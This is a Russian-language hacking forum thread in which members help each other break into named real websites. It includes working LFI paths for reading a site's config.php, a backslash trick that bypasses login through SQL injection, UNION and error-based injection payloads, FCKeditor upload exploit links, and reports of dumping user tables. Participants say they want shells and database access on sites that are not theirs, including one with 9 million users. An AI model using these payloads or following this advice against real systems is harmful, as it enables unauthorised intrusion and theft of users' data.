по чему то дальше не раскрутилась даже через Havij

в чём проблема?

Hapk said:
http://www.swspace.ru/reader/index.php?id=18&page=1'
по чему то дальше не раскрутилась даже через Havij
в чём проблема?


если я не ошибаюсь, то это не скуля...

smirk said:
если я не ошибаюсь, то это не скуля...


Ну тогда я понимаю что вообще нечего нельзя сделать да?

Hapk said:
Ну тогда я понимаю что вообще нечего нельзя сделать да?


Этоже LFI а мб и RFI, только хвостик ты врятли из запроса откинешь, поэтому чтение только в текущем котологе, хотя если код не инклюдиться\выполняеться что скорее всего правда, то это просто читалка в тек-щем котологе.

вот чуток удалось прочитать

http://www.swspace.ru/reader/index.php?id=18&page=../../%00

Думаю это его больше заинтересует

http://www.swspace.ru/reader/index.php?id=18&page=../../../config.php%00

http://www.swspace.ru/myadmin/

опа, чоткий! я конфиг в другой папке искал

.Varius said:
Т.к. используется реплейс одной одинарной кавычки на две, и если в коде нет больше никаких фильтраций и экранирований(и выключен magiq_quotes), то это легко обходится с помощью бэкслеша. Пример:
\' union select 111#
получится
select id from admins where admlogin='\'' union select 111#' and admpass=password('anyparol')
Первую кавычку мы экранируем, а вторую что подставит скрипт закроет запрос.


Спасибо! Я догадался использовать слеш, но уже когда иньектил в pass. В общем там я все раскрутил и получил Remote SQL Injection Authentication Bypass.

Теперь вопросы сложне)):

Через выше указанный SQL Injection Authentication Bypass я получил доступ к двум разным админкам одного ресурса. В одной есть blind-sql, его я даже не стал смотреть руками, сразу отправил в sqlmap, профит есть, все читается\дампиться но очень долго( одну табличку на 30 к записей (2 мб) дампил всю ночь. А там до черта нужных мне таблиц.

Вторая админка - редактор страниц сайта. Весь сайт построен на .shtml и редактировать можно только их. Профита в этом я пока еще не узрел(

Короче нужен шелл, а как закинуть не представляю.

И еще - через blind-sql в первой админке пробовал читать файлы, /etc/passwd читается нормально. Еще раньше я находил на ресурсе ошибки раскрытия системного пути и я знаю структуру папок, пробовал прочитать через инькт конфиги из корня сайта(типо mysql.inc.php), но не тут то было, сайт и бд на разных серваках, а через sql насколько я понимаю читаются те файлы которые на сервере бд, а не на сервере сайта, правильно? А структуру папок сервера бд я не знаю, может есть какие то стандартные пути до конфигов, подскажите. На сервере бд есть например ssh, может можно както стянуть хеши? В общем нужны идеи как полноценно залить шел на сайт, чтобы прочитать конфиг подключения к бд и нормально к ней подключаться, а не извращаться через иньект.

И, да, - логины\хеши пользователей бд я конечно сдампил через иньект, но они неразбиваемые, я прбовал, но в общем то я и так знаю что они там надежные - до 20 символов всякого извращения(

P.S. И еще, как называется уязвимость такого рода: к одному из разделов сайта есть доступ только из внутренней сети (диапазон ip) а я нашел способ проникать туда из обычного инета, как правильно называется тип такой уязвимости?

P.S.S. Я только учусь... Кстати: ищу Сенсея! Готов работать без еды и отдыха, только направляйте по пути истинного дзена

Помогите дальше раскрутить а то что-то не получается

http://telpics.ru/image.php?c=9

Nightmarе said:
А по каким критериям ты определил, что там уязвимость?
Я кроме как раскрытия путей более ничего не вижу.


Ну вот я вчера тоже спрашивал в топике

/showpost.php?p=3205291&postcount=20956

и мне помогли

/showpost.php?p=3205354&postcount=20961

там тоже раскрытие путей было

to Hapk

У тебя там скрипт возмущается, что не передан параметр id, вот и все, дырки в этом нет!

Вопрос наще вордпресс

Скажите, а как эксплуатировать дыру, найденную в плагине?

Точнее скажите, как файлы из плагина инклудятся в сам движок?

to Pirotexnik

Скачайте WordPress установите на localhost и установите уязвимый плагин который Вы хотите эксплуатировать в дальнейшем для взлома. Дальше открываете исходные коды и смотрите куда и где он прописан и как подгружается!

Есть скуля. дело в том, что если результат подстановки верный - идет редирект, при подстановке кавычки появилась ошибка, удалось подобрать количество полей +UnIoN+selecT+1,2,3,4,5,6,7,8+--+ при этом редиректит на главную, при других значениях выводится ошибка о количестве полей, как и положено. Теперь нужно вытащить имена таблиц, вопрос в том, как это сделать?

+UnIoN+selecT+1,table_name,3,4,5,6,7,8+frOm+inform ation_schema.tables

table_name впиши в поле вывода

Видимо я не совсем понял вопрос, попробуй вовыдить данные в ошибке, к примеру такой запрос


'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='1

OxoTnik said:
+UnIoN+selecT+1,table_name,3,4,5,6,7,8+frOm+inform ation_schema.tables
table_name впиши в поле вывода
Видимо я не совсем понял вопрос, попробуй вовыдить данные в ошибке, к примеру такой запрос


Спасибо за совет, второй вариант сработал, вывод ошибки присутствует, а в нем и Duplicate column, именно это и искал.

shell_c0de, вывода вообще нет, т.е. при запрете редиректа просто оповещает что будут перенаправление.

FCKeditor 2.6.4.1 Build 23187

как залиться? все прошлые способы поотключали (uploadtest, test html).

2shumaher есть еще browser.html/upload.php если есть аплоадер то попробуй сплойт http://www.exploit-db.com/exploits/17644/ или http://www.exploit-db.com/exploits/15484/

cat1vo said:
to
Pirotexnik
Скачайте WordPress установите на localhost и установите уязвимый плагин который Вы хотите эксплуатировать в дальнейшем для взлома. Дальше открываете исходные коды и смотрите куда и где он прописан и как подгружается!


Это все я сделал. Вопрос в том, где конкретно смотреть куда и как он инклудится.

Если не затруднит, можно краткий мини-фак на примере любого плагина?

VY_CMa said:
Есть скуля. дело в том, что если результат подстановки верный - идет редирект, при подстановке кавычки появилась ошибка, удалось подобрать количество полей +UnIoN+selecT+1,2,3,4,5,6,7,8+--+ при этом редиректит на главную, при других значениях выводится ошибка о количестве полей, как и положено. Теперь нужно вытащить имена таблиц, вопрос в том, как это сделать?


Попробуй так

'+/*!union+select+1,2,3,4,5,6,7,8*/--+f

kingbeef said:
Попробуй так
'+/*!union+select+1,2,3,4,5,6,7,8*/--+f


С этим разобрался. Нужно было провоцировать ошибку. Вариант подобрал - прилось использовать extractvalue();. Все успешно.

На очереди другой сайт с базой в 9 млн. юзеров. Проблема: при подстановке кавычки появилась ошибка, скуля проде как есть, при обновлении страницы, скуля пропадает :O. Пробовал разные браузеры передаваемые данные, реферы, ипы, юзерагенты, результат 0. Написал на php скрипт, используя curl получил страницу, вновь в ответе присутствовала ошибка от базы, при повторном получении страницы ошибки опять нет :О Вобщем как видно она появляется при каких то причинах, непонятно при каких, ваши мнения?

VY_CMa said:
С этим разобрался. Нужно было провоцировать ошибку. Вариант подобрал - прилось использовать extractvalue();. Все успешно.
На очереди другой сайт с базой в 9 млн. юзеров. Проблема: при подстановке кавычки появилась ошибка, скуля проде как есть, при обновлении страницы, скуля пропадает :O. Пробовал разные браузеры передаваемые данные, реферы, ипы, юзерагенты, результат 0. Написал на php скрипт, используя curl получил страницу, вновь в ответе присутствовала ошибка от базы, при повторном получении страницы ошибки опять нет :О Вобщем как видно она появляется при каких то причинах, непонятно при каких, ваши мнения?


Возьми оперу и отключи в настроиках для этого сайта прием кук, должно помочь

Вся проблема в слове "вроде"!

cat1vo said:
Вся проблема в слове "вроде"!




You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' )' at line 23


Ну если это не скуля то...


OxoTnik said:
Возьми оперу и отключи в настроиках для этого сайта прием кук, должно помочь


Проделывал на курле все что возможно, куки, рефер и т.д. Толку нуль.

Вот заголовки при том, когда скуля есть


Set-Cookie: KEY_PHPSESSID=deleted; expires=Fri, 15-Jul-2011 08:29:36 GMT; path=/;
Set-Cookie: PHPSESSID=bef9bd12d80e96587ffa41ed363bfd52; path=/
Set-Cookie: test=1; expires=Sun, 15-Jul-2012 10:29:37 GMT; path=/;
Set-Cookie: WEBMASTER_USERNAME=euroteeny%5C%27; expires=Sun, 15-Jul-2012 10:29:37 GMT; path=/;
Set-Cookie: WEBMASTER_USERNAME=euroteeny%5C%27; expires=Sun, 15-Jul-2012 10:29:37 GMT; path=/;
Set-Cookie: PROGRAM=s; expires=Sun, 15-Jul-2012 10:29:37 GMT; path=/;
Set-Cookie: PROGRAM=s; expires=Sun, 15-Jul-2012 10:29:37 GMT; path=/;
Set-Cookie: KEYWORD=; expires=Sun, 15-Jul-2012 10:29:37 GMT; path=/;
Set-Cookie: KEYWORD=deleted; expires=Fri, 15-Jul-2011 08:29:36 GMT; path=/;
Set-Cookie: KEYWORD1=; expires=Sun, 15-Jul-2012 10:29:37 GMT; path=/;
Set-Cookie: KEYWORD1=deleted; expires=Fri, 15-Jul-2011 08:29:36 GMT; path=/;
Set-Cookie: KEYWORD2=; expires=Sun, 15-Jul-2012 10:29:37 GMT; path=/;
Set-Cookie: KEYWORD2=deleted; expires=Fri, 15-Jul-2011 08:29:36 GMT; path=/;
Set-Cookie: KEYWORD3=; expires=Sun, 15-Jul-2012 10:29:37 GMT; path=/;
Set-Cookie: KEYWORD3=deleted; expires=Fri, 15-Jul-2011 08:29:36 GMT; path=/;
Set-Cookie: KEYWORD4=; expires=Sun, 15-Jul-2012 10:29:37 GMT; path=/;
Set-Cookie: KEYWORD4=deleted; expires=Fri, 15-Jul-2011 08:29:36 GMT; path=/;
Set-Cookie: SUB=; expires=Sun, 15-Jul-2012 10:29:37 GMT; path=/;
Set-Cookie: SUB=deleted; expires=Fri, 15-Jul-2011 08:29:36 GMT; path=/;
Set-Cookie: WEBMASTER_ID=1; expires=Sun, 15-Jul-2012 10:29:37 GMT; path=/;
Set-Cookie: WEBMASTER_ID=1; expires=Sun, 15-Jul-2012 10:29:37 GMT; path=/;
Set-Cookie: SESSION_ID=1342081; expires=Sun, 15-Jul-2012 10:29:37 GMT; path=/;
Set-Cookie: SESSION_ID=1342081; expires=Sun, 15-Jul-2012 10:29:37 GMT; path=/;
Transfer-Encoding: chunked
Content-Type: text/html
X-Powered-By: PHP/5.2.17


А это когда нет


Set-Cookie: KEY_PHPSESSID=deleted; expires=Fri, 15-Jul-2011 08:33:56 GMT; path=/;
Set-Cookie: PHPSESSID=d4658f181029c3561a0a14f591bb96e1; path=/ Set-Cookie: test=1; expires=Sun, 15-Jul-2012 10:33:57 GMT; path=/;
Set-Cookie: test=1; expires=Sun, 15-Jul-2012 10:33:57 GMT; path=/;
Set-Cookie: SESSION_ID=1342081; expires=Sun, 15-Jul-2012 10:33:57 GMT; path=/;
Set-Cookie: SESSION_ID=1342081; expires=Sun, 15-Jul-2012 10:33:57 GMT; path=/;
Set-Cookie: lwpopdata=1032 Transfer-Encoding: chunked
Content-Type: text/html
X-Powered-By: PHP/5.2.17


Как уже сказал дело видимо не в куках.

Проводил тесты с разными ипами, попытки разных сессий, результата не дали.

Пока не могу сообразить какие условия нужны...

Кстати сервер: Zeus, версию определить не получается

Вся проблема: скулья в INSERT. Элементарно же =) Значит ,(error-based).

P.S. В INSERT могут попадать и User-Agent. Это полезно, когда значение User-Agent не фильтруется

Как вариант попробуйте воспользоваться Burp Suite или WebScarab, например. И смотреть там, что передается и принимается!

Вопрос по Активной XSS

У меня вопрос:

Вот нашел я активную XSS-ку ...но меня не интересуют куки ....мне до корней сайта охота добраться, до базы и всего прочего.

Вместо XSS подставлял HTML, работают все HTML теги, в javascript'e работают целые отрывки кода причём многострочного.... А теперь к сути вопроса:

Как средствами HTML и Javascript'a сделать допустим листинг документа или залить файло на сервак.

PHP не хочет работать, фильтруется, на запрос


PHP:


превращается в


PHP:


. Либо фильтрацию помогите обойти, потому как в PHP я знаю как сделать листинг документа.

HeBepHyCb,

где-то я такое видел, там вроде в документации было shell или [php*]shell[/php*]. Попробуй, мб это тот скрипт, который мне попадался =)